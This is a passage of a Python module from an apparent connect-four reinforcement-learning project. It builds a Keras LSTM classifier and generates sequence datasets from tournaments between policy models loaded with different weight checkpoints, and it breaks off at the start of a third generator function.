def initialize_circuits_1(final_measure=True):
    """Initialize-instruction test circuits on three qubits.

    Every circuit first prepares |+++> with Hadamards, then applies
    ``initialize`` to one, two, or three qubits:

    * qr[i] -> |1> for each i
    * (qr[i], qr[j]) -> |01> for every ordered pair i != j
    * (qr[i], qr[j], qr[k]) -> |01-> for every permutation (i, j, k)

    Args:
        final_measure (bool): when True, append a barrier and measure all
            qubits into a 3-bit classical register.

    Returns:
        list[QuantumCircuit]: the test circuits, in the order above.
    """
    # permutations(range(3), r) yields index tuples in exactly the same
    # order as the original nested loops with distinct-index filtering.
    from itertools import permutations

    circuits = []
    qr = QuantumRegister(3)
    if final_measure:
        cr = ClassicalRegister(3)
        regs = (qr, cr)
    else:
        regs = (qr, )

    def _finish(circuit):
        # Optionally add final measurements, then record the circuit.
        if final_measure:
            circuit.barrier(qr)
            circuit.measure(qr, cr)
        circuits.append(circuit)

    # Start with |+++> state; initialize qr[i] to |1> for i = 0, 1, 2.
    for qubit in range(3):
        circuit = QuantumCircuit(*regs)
        circuit.h(qr)  # broadcast over the register (as in initialize_circuits_2)
        circuit.initialize([0, 1], [qr[qubit]])
        _finish(circuit)

    # Initialize qr[i] to |1> and qr[j] to |0> for all ordered pairs i != j.
    for qubit_i, qubit_j in permutations(range(3), 2):
        circuit = QuantumCircuit(*regs)
        circuit.h(qr)
        circuit.initialize([0, 1, 0, 0], [qr[qubit_i], qr[qubit_j]])
        _finish(circuit)

    # Initialize qr[i] to |1>, qr[j] to |0>, qr[k] to |-> for all
    # permutations (i, j, k) of (0, 1, 2).
    for qubit_i, qubit_j, qubit_k in permutations(range(3), 3):
        circuit = QuantumCircuit(*regs)
        circuit.h(qr)
        circuit.initialize([0, 1, 0, 0, 0, -1, 0, 0] / sqrt(2),
                           [qr[qubit_i], qr[qubit_j], qr[qubit_k]])
        _finish(circuit)
    return circuits
def initialize_counts_1(shots, hex_counts=True):
    """Reference counts for ``initialize_circuits_1``.

    Args:
        shots (int): total shots, split evenly over the allowed outcomes.
        hex_counts (bool): hex outcome keys ('0x1') when True, otherwise
            zero-padded bit strings ('001').

    Returns:
        list[dict]: one counts dict per circuit (15 in total).
    """
    def outcome_key(bits):
        # bits is the 3-bit measurement outcome as an integer.
        return hex(bits) if hex_counts else format(bits, '03b')

    targets = []
    # Single-qubit initialize: qubit i forced to |1>, the other two stay
    # uniform, so the four outcomes with bit i set each get shots/4.
    for i in range(3):
        allowed = [b for b in range(8) if b >> i & 1]
        targets.append({outcome_key(b): shots / 4 for b in allowed})
    # Pair initialize (i -> |1>, j -> |0>): two outcomes, shots/2 each.
    # The triple-initialize circuits leave qubit k in |->, which measures
    # uniformly, so their counts repeat the pair-case dictionaries.
    pair_order = [(0, 1), (0, 2), (1, 0), (1, 2), (2, 0), (2, 1)]
    for i, j in pair_order + pair_order:
        allowed = [b for b in range(8) if (b >> i & 1) and not (b >> j & 1)]
        targets.append({outcome_key(b): shots / 2 for b in allowed})
    return targets
def initialize_statevector_1():
    """Reference statevectors for ``initialize_circuits_1``.

    Returns:
        list[numpy.ndarray]: one 8-amplitude complex statevector per circuit.
    """
    targets = []
    # Single-qubit initialize: qubit i in |1>, the other two remain |+>,
    # so amplitude 0.5 sits on every basis state with bit i set.
    for i in range(3):
        targets.append(array([0.5 + 0.j if b >> i & 1 else 0. + 0.j
                              for b in range(8)]))
    # Pair initialize: qubit i |1>, qubit j |0>, remaining qubit |+>.
    pair_order = [(0, 1), (0, 2), (1, 0), (1, 2), (2, 0), (2, 1)]
    for i, j in pair_order:
        amps = [1.0 + 0.j if (b >> i & 1) and not (b >> j & 1) else 0. + 0.j
                for b in range(8)]
        targets.append(array(amps) / sqrt(2))
    # Triple initialize: qubit i |1>, qubit j |0>, qubit k |->; the |->
    # component flips the sign wherever bit k is set.
    triple_order = [(0, 1, 2), (0, 2, 1), (1, 0, 2),
                    (1, 2, 0), (2, 0, 1), (2, 1, 0)]
    for i, j, k in triple_order:
        amps = [0. + 0.j] * 8
        for b in range(8):
            if (b >> i & 1) and not (b >> j & 1):
                amps[b] = -1.0 + 0.j if b >> k & 1 else 1.0 + 0.j
        targets.append(array(amps) / sqrt(2))
    return targets
def initialize_circuits_2(final_measure=True):
    """Initialize-instruction test circuits on two qubits.

    Each circuit prepares |++> and then initializes one qubit to |1>.

    Args:
        final_measure (bool): append a barrier and measure both qubits
            when True.

    Returns:
        list[QuantumCircuit]: two circuits (target qubit 0, then 1).
    """
    circuits = []
    qr = QuantumRegister(2)
    if final_measure:
        cr = ClassicalRegister(2)
        regs = (qr, cr)
    else:
        regs = (qr, )
    # One circuit per target qubit, starting from |++>.
    for target in (0, 1):
        circuit = QuantumCircuit(*regs)
        circuit.h(qr)
        circuit.initialize([0, 1], [qr[target]])
        if final_measure:
            circuit.barrier(qr)
            circuit.measure(qr, cr)
        circuits.append(circuit)
    return circuits
def initialize_counts_2(shots, hex_counts=True):
    """Reference counts for ``initialize_circuits_2``.

    Args:
        shots (int): total shots, split evenly over the two outcomes.
        hex_counts (bool): hex keys when True, bit-string keys otherwise.

    Returns:
        list[dict]: one counts dict per circuit.
    """
    half = shots / 2
    # Forcing qubit i to |1> leaves two equally likely outcomes.
    if hex_counts:
        outcome_pairs = [('0x1', '0x3'), ('0x2', '0x3')]
    else:
        outcome_pairs = [('01', '11'), ('10', '11')]
    return [{low: half, high: half} for low, high in outcome_pairs]
def initialize_statevector_2():
    """Reference statevectors for ``initialize_circuits_2``.

    Returns:
        list[numpy.ndarray]: one 4-amplitude statevector per circuit.
    """
    # Qubit 0 -> |1>: support on |01>, |11> (indices 1, 3).
    # Qubit 1 -> |1>: support on |10>, |11> (indices 2, 3).
    return [array([0, 1, 0, 1]) / sqrt(2),
            array([0, 0, 1, 1]) / sqrt(2)]
# ==========================================================================
# Sampling optimization
# ==========================================================================
def initialize_sampling_optimization():
    """Circuit for which measurement-sampling optimization must stay off.

    Builds a Bell pair and then re-initializes qubit 0 to |0>. Because the
    initialize operation performs randomization, the simulator must not
    satisfy all shots by sampling a single final state.

    Returns:
        list[QuantumCircuit]: a single-element list with the test circuit.
    """
    qreg = QuantumRegister(2)
    creg = ClassicalRegister(2)
    circ = QuantumCircuit(qreg, creg)
    circ.h(qreg[0])
    circ.cx(qreg[0], qreg[1])
    circ.initialize([1, 0], [qreg[0]])
    circ.measure(qreg, creg)
    return [circ]
def initialize_counts_sampling_optimization(shots, hex_counts=True):
    """Reference counts for ``initialize_sampling_optimization``.

    After re-initializing qubit 0 of a Bell pair to |0>, the outcomes
    '00' and '10' each occur with probability 1/2.

    Args:
        shots (int): total shots, split evenly between the two outcomes.
        hex_counts (bool): hex keys when True, bit-string keys otherwise.

    Returns:
        list[dict]: one counts dict for the single reference circuit.
    """
    if hex_counts:
        return [{'0x0': shots / 2, '0x2': shots / 2}]
    # Bug fix: the non-hex branch previously returned '0x00'/'0x10' —
    # hex-prefixed strings instead of the plain bit-string keys used by
    # every other reference-count helper (cf. initialize_counts_2).
    return [{'00': shots / 2, '10': shots / 2}]
| 37.857585
| 99
| 0.456003
| 1,706
| 12,228
| 3.239156
| 0.079132
| 0.043431
| 0.058632
| 0.052117
| 0.80818
| 0.769273
| 0.737785
| 0.715527
| 0.70105
| 0.624502
| 0
| 0.108657
| 0.348217
| 12,228
| 322
| 100
| 37.975155
| 0.584693
| 0.247628
| 0
| 0.717073
| 0
| 0
| 0.027524
| 0
| 0
| 0
| 0.014753
| 0
| 0
| 1
| 0.039024
| false
| 0
| 0.009756
| 0
| 0.092683
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
530e826259bbd062eb1c1abfe05d8820344b7d01
| 101
|
py
|
Python
|
kornia/geometry/warp/__init__.py
|
pmeier/kornia
|
57f5aeb605d0c69de88a0a1aa1563cee52d4bfaf
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2021-01-26T05:25:01.000Z
|
2022-02-08T06:10:41.000Z
|
kornia/geometry/warp/__init__.py
|
pmeier/kornia
|
57f5aeb605d0c69de88a0a1aa1563cee52d4bfaf
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2021-05-03T10:34:15.000Z
|
2022-02-17T04:25:26.000Z
|
kornia/geometry/warp/__init__.py
|
pmeier/kornia
|
57f5aeb605d0c69de88a0a1aa1563cee52d4bfaf
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2021-04-30T01:51:38.000Z
|
2022-01-27T05:06:04.000Z
|
from kornia.geometry.warp.homography_warper import *
from kornia.geometry.warp.depth_warper import *
| 33.666667
| 52
| 0.841584
| 14
| 101
| 5.928571
| 0.571429
| 0.240964
| 0.433735
| 0.53012
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079208
| 101
| 2
| 53
| 50.5
| 0.892473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
53195ebb4eb50b0707bba2cc88d96afb60e41d83
| 33
|
py
|
Python
|
tests/tests_unit/test_api/good_absolute_import/shared/util.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
tests/tests_unit/test_api/good_absolute_import/shared/util.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
tests/tests_unit/test_api/good_absolute_import/shared/util.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
def shared_func():
    """Return the shared test constant, 42."""
    answer = 42
    return answer
| 11
| 18
| 0.666667
| 5
| 33
| 4.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 0.242424
| 33
| 2
| 19
| 16.5
| 0.76
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
7263e0a4e7a780153965a53eb89c8abaf125d29d
| 4,345
|
py
|
Python
|
plot_micrometals_pv_official.py
|
dword1511/powdercore-q
|
ddf24c50e8178033a30cfbbf94642a5199764da6
|
[
"Apache-2.0"
] | null | null | null |
plot_micrometals_pv_official.py
|
dword1511/powdercore-q
|
ddf24c50e8178033a30cfbbf94642a5199764da6
|
[
"Apache-2.0"
] | null | null | null |
plot_micrometals_pv_official.py
|
dword1511/powdercore-q
|
ddf24c50e8178033a30cfbbf94642a5199764da6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
from pv_plotter import PvPlotter
import micrometals
if __name__ == '__main__':
    plotter = PvPlotter()

    # Line colors/styles and axis settings shared by every plot.
    colors = ['#a50021', '#cc0000', '#ff5050', '#ff9999', '#3366ff', '#0000cc', '#00cc66', '#006400', '#ff3399', '#cc0099']
    styles = ['--', '-', ':', '-.', '--', '-.', '--', '--', ':', '-']
    pv_range = [10, 10000]
    log = {'b': True, 'p': True}
    size = (3.5, 2)
    units = {'l': 'cm', 'p': 'mW', 'b': 'G'}

    # Mix 1 uses its own frequency list and Bpk range.
    f = {'MHz': [10, 5, 2, 1], 'kHz': [500, 200, 100, 50, 10, 1]}
    bpk_range = [1, 10000]
    plotter.plot_one_mat(micrometals.Mix_1(), f, colors, styles, bpk_range,
                         pv_range, log, size, units)

    # As in datasheet. Commenting bpk_range and f out gives more informative graph
    bpk_range = [10, 10000]
    f = {'kHz': [500, 250, 100, 50, 25, 10, 5, 1], 'Hz': [400, 60]}

    # All remaining materials share the same settings; the previous
    # copy-pasted call per material is replaced with a single loop.
    remaining_mixes = ['Mix_2', 'Mix_3', 'Mix_4', 'Mix_6', 'Mix_7', 'Mix_8',
                       'Mix_10', 'Mix_14', 'Mix_15', 'Mix_17', 'Mix_18',
                       'Mix_19', 'Mix_26', 'Mix_30', 'Mix_34', 'Mix_35',
                       'Mix_38', 'Mix_40', 'Mix_45', 'Mix_52', 'Mix_60',
                       'Mix_61', 'Mix_63', 'Mix_65', 'Mix_66', 'Mix_70',
                       'Mix_M125']
    for mix_name in remaining_mixes:
        material = getattr(micrometals, mix_name)()
        plotter.plot_one_mat(material, f, colors, styles, bpk_range,
                             pv_range, log, size, units)
| 41.380952
| 124
| 0.688608
| 627
| 4,345
| 4.527911
| 0.148325
| 0.087355
| 0.143008
| 0.167665
| 0.84255
| 0.84255
| 0.84255
| 0.84255
| 0.84255
| 0.84255
| 0
| 0.043792
| 0.16962
| 4,345
| 104
| 125
| 41.778846
| 0.743071
| 0.022555
| 0
| 0.4
| 0
| 0
| 0.027091
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
728c01bad19303a74b6fa600231b7732020fd3cd
| 177
|
py
|
Python
|
utils/__init__.py
|
fringebits/AdventOfCode-2021
|
a54edb07a3585e30abf56efd57abe188861f1855
|
[
"MIT"
] | 1
|
2015-12-10T19:36:37.000Z
|
2015-12-10T19:36:37.000Z
|
utils/__init__.py
|
fringebits/AdventOfCode-2021
|
a54edb07a3585e30abf56efd57abe188861f1855
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
fringebits/AdventOfCode-2021
|
a54edb07a3585e30abf56efd57abe188861f1855
|
[
"MIT"
] | null | null | null |
from .helpers import bisect
from .helpers import xor
from .load import load_input
from .timer import timer
from .timer import Timer
from .vec2 import Vec2
from .vec3 import Vec3
| 25.285714
| 28
| 0.80791
| 29
| 177
| 4.896552
| 0.344828
| 0.15493
| 0.239437
| 0.28169
| 0.309859
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026667
| 0.152542
| 177
| 7
| 29
| 25.285714
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
72eb046fdf5b853db1bc2a945c7321f7ad12a0b9
| 59,155
|
py
|
Python
|
utils/learning_behaviour_utils.py
|
ColdFrenzy/Adaptive_Learning
|
02cdd519a7e224fe5f2a49b0c21baa3dac5ce0e1
|
[
"MIT"
] | null | null | null |
utils/learning_behaviour_utils.py
|
ColdFrenzy/Adaptive_Learning
|
02cdd519a7e224fe5f2a49b0c21baa3dac5ce0e1
|
[
"MIT"
] | null | null | null |
utils/learning_behaviour_utils.py
|
ColdFrenzy/Adaptive_Learning
|
02cdd519a7e224fe5f2a49b0c21baa3dac5ce0e1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import os
import random
import numpy as np
import logging
import math
from policies.minimax_policy import minimax
from policies.minimax_connect3 import minimax_connect3
sys.path.insert(1, os.path.abspath(os.pardir))
from config.custom_config import Config
from config.connect4_config import Connect4Config,Connect3Config
from env.connect4_multiagent_env import Connect4Env
from utils.pre_compute_elo import board_print
player1 = Connect4Config.PLAYER1
player2 = Connect4Config.PLAYER2
player1_ID = Connect4Config.PLAYER1_ID
player2_ID = Connect4Config.PLAYER2_ID
from tensorflow import keras
from tensorflow.keras import layers
def LSTM_model(batch_size, input_shape, output_shape, lstm_hidden, show_summary):
    """Build and compile a single-layer LSTM classifier.

    Args:
        batch_size: unused in this body; kept for interface compatibility.
        input_shape: unused in this body; kept for interface compatibility.
        output_shape: size of the softmax output (number of classes —
            the different minimax depths).
        lstm_hidden: number of hidden units in the LSTM layer.
        show_summary: when True, print the Keras model summary.

    Returns:
        A compiled ``keras.Sequential`` model.
    """
    net = keras.Sequential()
    # time_major=False => inputs are laid out as [batch, timestep, features].
    net.add(layers.LSTM(lstm_hidden, time_major=False))
    net.add(layers.Dense(output_shape))
    net.add(layers.Softmax())
    net.compile(
        optimizer=keras.optimizers.RMSprop(),
        loss=keras.losses.CosineSimilarity(),
        metrics=[keras.metrics.CategoricalAccuracy()],
    )
    if show_summary:
        net.summary()
    return net
def model_vs_model_connect3_generate_data(model1,model2,weights, number_of_games,sequence_len,randomize=True,number_of_stochastic_moves=0,logger=None):
    """
    generates game data from games with the board seen by model1 pov

    Plays a round-robin tournament on a Connect-3 board: model1 and model2
    each cycle through every weight checkpoint in ``weights``.  Every game
    is encoded move-by-move; each window of ``sequence_len`` consecutive
    (flattened board + action) steps from model1's moves becomes one
    (sequence, label) training sample.

    :param model1: policy whose moves are recorded; must expose
        ``base_model.set_weights`` and ``forward(input_dict, state, seq_lens)``.
    :param model2: opponent policy with the same interface.
    :param weights: dict mapping checkpoint name -> weights.  The sample
        label is parsed from the checkpoint name (last character of the
        first "_"-separated token) — presumably an agent-level index;
        verify against the checkpoint naming convention.
    :param number_of_games: games played per (w1, w2) weight pairing.
    :param sequence_len: window length of each emitted sample.
    :param randomize: randomly pick the starting player when True.
    :param number_of_stochastic_moves: for the first N timesteps actions
        are sampled from softmaxed logits instead of argmax.
    :param logger: optional logger for progress messages.
    :return: (total_sequence_list, total_games_list, dataset,
        dataset_no_clones) — ``dataset`` keeps every window,
        ``dataset_no_clones`` only windows whose string encoding was not
        seen before; the two lists are keyed per label in the dicts.
    """
    game = Connect4Env(None,width=Connect3Config.WIDTH,
                       height=Connect3Config.HEIGHT,
                       n_actions=Connect3Config.N_ACTIONS,
                       connect=Connect3Config.CONNECT,
                       )
    dataset_no_clones = []
    dataset = []
    # game encoded as a string
    games_list = []
    number_of_equal_games = 0
    # sequence of configuration encoded as a string
    sequence_list = []
    number_of_equal_sequences = 0
    total_sequence_list = {}
    total_games_list = {}
    label = 0
    # Tournament between agents with different weights
    for w1_indx,w1 in enumerate(weights):
        model1.base_model.set_weights(weights[w1])
        if logger:
            logger.info("STARTING WITH WEIGHTS: " + w1)
        # before updating the label, we check if we have a new one, in that case
        # we reset both
        new_label = int(w1.split("_")[0][-1])
        if new_label != label:
            if label != 0:
                # Flush the accumulators gathered under the previous label.
                total_games_list[label] = games_list
                total_sequence_list[label] = sequence_list
                games_list = []
                sequence_list = []
            label = int(w1.split("_")[0][-1])
        for w2_indx,w2 in enumerate(weights):
            # DELETE
            # if w2_indx > 3:
            #     continue
            # if w2_indx < w1_indx:
            #     continue
            print("Starting weights " + str(w1) + " vs weights " + str(w2))
            model2.base_model.set_weights(weights[w2])
            for i in range(number_of_games):
                # temp action and board state,
                #action_total = []
                board_plus_action_total = []
                timestep = 0
                game_over = False
                actions = {}
                # encoded_game: starting-player tag followed by one char per move.
                encoded_game = []
                if randomize:
                    starting_player = random.choice([player1_ID, player2_ID])
                    if starting_player == player1_ID:
                        encoded_game.append("p1_")
                    elif starting_player == player2_ID:
                        encoded_game.append("p2_")
                else:
                    starting_player = player1_ID
                    encoded_game.append("p1_")
                game.reset(starting_player=starting_player,randomize=False)
                while not game_over:
                    timestep += 1
                    actual_player = game.current_player
                    board = game.board
                    board_p2 = game.board_p2
                    if actual_player == player1_ID:
                        input_dict = {"obs": {}}
                        action_mask = game.get_moves(True)
                        input_dict["obs"]["state"] = board
                        input_dict["obs"]["action_mask"] = action_mask
                        action_logits, _ = model1.forward(input_dict, None, None)
                        if timestep > number_of_stochastic_moves:
                            # Deterministic phase: greedy action.
                            act = np.argmax(action_logits[0])
                        elif timestep <= number_of_stochastic_moves:
                            # Stochastic phase: sample from softmaxed logits.
                            # NOTE(review): the action list [0,1,2,3,4] is
                            # hard-coded — confirm it equals Connect3Config.N_ACTIONS.
                            action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
                            act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
                        encoded_game.append(str(act))
                        # Only model1's moves are recorded as training features.
                        flattened_board = np.ndarray.flatten(board)
                        board_plus_actions = np.append(flattened_board,float(act))
                        board_plus_action_total.append([board_plus_actions])
                        actions[player1] = act
                        _, rew, done, _ = game.step(actions)
                    elif actual_player == player2_ID:
                        input_dict = {"obs": {}}
                        action_mask = game.get_moves(True)
                        input_dict["obs"]["state"] = board_p2 #reshaped_board
                        input_dict["obs"]["action_mask"] = action_mask
                        action_logits, _ = model2.forward(input_dict, None, None)
                        if timestep > number_of_stochastic_moves:
                            act = np.argmax(action_logits[0])
                        elif timestep <= number_of_stochastic_moves:
                            action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
                            act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
                        encoded_game.append(str(act))
                        actions[player2] = act
                        _, rew, done, _ = game.step(actions)
                    else:
                        raise ValueError("Player index is not valid, should be 0 or 1")
                    if done["__all__"]:
                        game_over = True
                        game_str = ''.join(encoded_game)
                        # ADD ENCODED GAME TO THE LISt
                        if game_str in games_list:
                            number_of_equal_games += 1
                        elif game_str not in games_list:
                            games_list.append(game_str)
                        # if the game is too short, just discard it
                        if len(board_plus_action_total) < sequence_len:
                            continue
                        # Slide a window of sequence_len steps over the game.
                        for j in range(len(board_plus_action_total)-(sequence_len-1)):
                            to_string=str(board_plus_action_total[j:j+sequence_len])
                            if to_string in sequence_list:
                                number_of_equal_sequences += 1
                            else:
                                # Unseen window: keep it in the de-duplicated set too.
                                sequence_list.append(to_string)
                                dataset_no_clones.append([])
                                dataset_no_clones[-1].append(board_plus_action_total[j:j+sequence_len])
                                dataset_no_clones[-1].append(label)
                            # Every window (duplicate or not) goes to the full dataset.
                            dataset.append([])
                            dataset[-1].append(board_plus_action_total[j:j+sequence_len])
                            dataset[-1].append(label)
    # Flush the accumulators for the final label.
    total_games_list[label] = games_list
    total_sequence_list[label] = sequence_list
    print("The number of equal games is: " + str(number_of_equal_games))
    print("The number of equal sequences is: " + str(number_of_equal_sequences))
    return total_sequence_list, total_games_list, dataset,dataset_no_clones
def model_vs_model_connect3_generate_data_v2(model1,model2,weights, number_of_games,sequence_len,randomize=True,number_of_stochastic_moves=0,logger=None):
    """
    generates game data from games with the board seen by model1 pov

    Every checkpoint in ``weights`` (as model1) plays ``number_of_games``
    games against every checkpoint (as model2).  Only model1's moves are
    recorded: each step is the flattened board plus the chosen action, and
    each finished game is sliced into overlapping windows of
    ``sequence_len`` steps.  Each window is labelled with the digit parsed
    from the model1 weight name (``int(w1.split("_")[0][-1])``).

    :params:
        model1, model2: policies exposing ``base_model.set_weights`` and
            ``forward(input_dict, None, None)`` -> (action_logits, _)
        weights: mapping of weight-name -> weight values
        number_of_games: int, games per (w1, w2) pairing
        sequence_len: int, window length; shorter games are discarded
        randomize: bool, randomize which player starts
        number_of_stochastic_moves: int, the first N plies are sampled from
            the softmax of the logits instead of greedy argmax
        logger: optional logger
    :returns:
        (games_list, sequence_list, dataset, dataset_no_clones) where
        ``dataset`` keeps every window and ``dataset_no_clones`` only the
        first occurrence of each distinct window.
    """
    game = Connect4Env(None,width=Connect3Config.WIDTH,
                       height=Connect3Config.HEIGHT,
                       n_actions=Connect3Config.N_ACTIONS,
                       connect=Connect3Config.CONNECT,
                       )
    dataset_no_clones = []
    dataset = []
    # game encoded as a string
    games_list = []
    number_of_equal_games = 0
    # per-label counters of duplicate windows (labels 1 / 4 / 6 only)
    lv1_skipped = 0
    lv4_skipped = 0
    lv6_skipped = 0
    # sequence of configuration encoded as a string
    sequence_list = []
    number_of_equal_sequences = 0
    # Tournament between agents with different weights
    for w1_indx,w1 in enumerate(weights):
        model1.base_model.set_weights(weights[w1])
        if logger:
            logger.info("STARTING WITH WEIGHTS: " + w1)
        # class label = trailing digit of the first "_"-token of the name
        label = int(w1.split("_")[0][-1])
        for w2_indx,w2 in enumerate(weights):
            print("Starting weights " + str(w1) + " vs weights " + str(w2))
            model2.base_model.set_weights(weights[w2])
            for i in range(number_of_games):
                # per-game accumulators
                board_plus_action_total = []
                timestep = 0
                game_over = False
                actions = {}
                # human-readable encoding, e.g. "p1_" followed by the moves
                encoded_game = []
                if randomize:
                    starting_player = random.choice([player1_ID, player2_ID])
                    if starting_player == player1_ID:
                        encoded_game.append("p1_")
                    elif starting_player == player2_ID:
                        encoded_game.append("p2_")
                else:
                    starting_player = player1_ID
                    encoded_game.append("p1_")
                game.reset(starting_player=starting_player,randomize=False)
                while not game_over:
                    timestep += 1
                    actual_player = game.current_player
                    board = game.board
                    board_p2 = game.board_p2
                    if actual_player == player1_ID:
                        input_dict = {"obs": {}}
                        action_mask = game.get_moves(True)
                        input_dict["obs"]["state"] = board
                        input_dict["obs"]["action_mask"] = action_mask
                        action_logits, _ = model1.forward(input_dict, None, None)
                        if timestep > number_of_stochastic_moves:
                            # deterministic play: greedy argmax over the logits
                            act = np.argmax(action_logits[0])
                        elif timestep <= number_of_stochastic_moves:
                            # exploration: sample an action from the softmax
                            action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
                            act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
                        encoded_game.append(str(act))
                        # only model1 (player 1) steps become training data
                        flattened_board = np.ndarray.flatten(board)
                        board_plus_actions = np.append(flattened_board,float(act))
                        board_plus_action_total.append([board_plus_actions])
                        actions[player1] = act
                        _, rew, done, _ = game.step(actions)
                    elif actual_player == player2_ID:
                        input_dict = {"obs": {}}
                        action_mask = game.get_moves(True)
                        input_dict["obs"]["state"] = board_p2 #reshaped_board
                        input_dict["obs"]["action_mask"] = action_mask
                        action_logits, _ = model2.forward(input_dict, None, None)
                        if timestep > number_of_stochastic_moves:
                            act = np.argmax(action_logits[0])
                        elif timestep <= number_of_stochastic_moves:
                            action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
                            act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
                        encoded_game.append(str(act))
                        actions[player2] = act
                        _, rew, done, _ = game.step(actions)
                    else:
                        raise ValueError("Player index is not valid, should be 0 or 1")
                    if done["__all__"]:
                        game_over = True
                        game_str = ''.join(encoded_game)
                        # add the encoded game to the list
                        if game_str in games_list:
                            number_of_equal_games += 1
                        elif game_str not in games_list:
                            games_list.append(game_str)
                        # if the game is too short, just discard it
                        if len(board_plus_action_total) < sequence_len:
                            continue
                        # slide a window of sequence_len over the recorded steps
                        for j in range(len(board_plus_action_total)-(sequence_len-1)):
                            to_string=str(board_plus_action_total[j:j+sequence_len])
                            if to_string in sequence_list:
                                number_of_equal_sequences += 1
                                # NOTE(review): only labels 1/4/6 are tracked
                                # here — other labels are silently untallied
                                if label == 1:
                                    lv1_skipped += 1
                                elif label == 4:
                                    lv4_skipped += 1
                                elif label == 6:
                                    lv6_skipped += 1
                            else:
                                sequence_list.append(to_string)
                                dataset_no_clones.append([])
                                dataset_no_clones[-1].append(board_plus_action_total[j:j+sequence_len])
                                dataset_no_clones[-1].append(label)
                            # 'dataset' keeps every window, duplicates included
                            dataset.append([])
                            dataset[-1].append(board_plus_action_total[j:j+sequence_len])
                            dataset[-1].append(label)
    print("The number of equal games is: " + str(number_of_equal_games))
    print("The number of equal sequences is: " + str(number_of_equal_sequences))
    print("depth 1 skipped: " + str(lv1_skipped))
    print("depth 4 skipped: " + str(lv4_skipped))
    print("depth 6 skipped: " + str(lv6_skipped))
    return games_list, sequence_list, dataset,dataset_no_clones
def model_vs_model_connect3_generate_data_v3(model1,model2,weights, number_of_games,sequence_len,randomize=True,number_of_stochastic_moves=0,logger=None):
    """
    In this version we also added the outcome of the game to the vector
    of the sequence of moves

    Same tournament loop as v2, but every recorded step additionally
    carries the final outcome seen from player1 (7.0 win / 8.0 loss /
    9.0 draw), and the per-game / per-sequence strings are grouped by
    label in the returned dicts.

    NOTE(review): the reset logic assumes ``weights`` is ordered so that
    all checkpoints with the same label are contiguous, and that 0 is
    never a real label (it is the "no label yet" sentinel) — confirm.

    :returns:
        (total_sequence_list, total_games_list, dataset, dataset_no_clones)
        where the first two map label -> list of encoded strings.
    """
    game = Connect4Env(None,width=Connect3Config.WIDTH,
                       height=Connect3Config.HEIGHT,
                       n_actions=Connect3Config.N_ACTIONS,
                       connect=Connect3Config.CONNECT,
                       )
    dataset_no_clones = []
    dataset = []
    # game encoded as a string
    games_list = []
    number_of_equal_games = 0
    # sequence of configuration encoded as a string
    sequence_list = []
    number_of_equal_sequences = 0
    total_sequence_list = {}
    total_games_list = {}
    label = 0
    # Tournament between agents with different weights
